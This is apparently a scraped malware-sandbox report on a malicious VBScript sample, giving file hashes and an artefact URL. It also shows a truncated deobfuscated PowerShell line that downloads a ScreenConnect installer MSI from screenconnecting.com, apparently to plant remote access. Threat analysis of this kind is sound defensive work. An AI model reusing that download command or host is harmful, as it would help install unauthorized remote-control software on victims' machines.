Malicious

c0e8a7d3460797752109146ab25c38cd

VBScript
|
MD5: c0e8a7d3460797752109146ab25c38cd
|
Size: 2.16 KB
|
text/vbscript

Print

Infection Chain

Summary by MalvaGPT

Characteristics

Hash	Hash Value
MD5	c0e8a7d3460797752109146ab25c38cd
Sha1	7750b88fc68d0188dec342ceb32694c0458eb2af
Sha256	98568d1ac92ad08eb8055fba873b6c9ea8096b0b412f60857e117e669bf9d266
Sha384	0497fd849b636cdcf3f4ca6656554c9c18716da5d010e3ca5b13432fd4c8501b5d3ba002215ebfe44ef352cd176ba7a3
Sha512	545d8e5b2360abb526222bf8c0f08bc9bf93441a8f9311d62f27292ddcee85aee6e1c4e97d9af263064feec67f66f6743174b9a7b940d38b891f62fcf65cfe4c
SSDeep	48:J1pJ6QUXjr4qblzMH1XwiH7OjSKD0UWcfhl/B77gAk:Hn6QWuVHH7i7rfhlJcb
TLSH	4641630BFE48D338969BC0A665A78C4C98404903151488B7FBDC86A55F6573DDBC63F6

File Structure

Artefacts

Name0	Value
URLs in VB Code - #1	https://screenconnecting.com/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest
Deobfuscated PowerShell	"[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $url = 'https://screenconnecting.com/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest'; $out = '"

c0e8a7d3460797752109146ab25c38cd (2.16 KB)

An error has occurred. This application may no longer respond until reloaded. Reload 🗙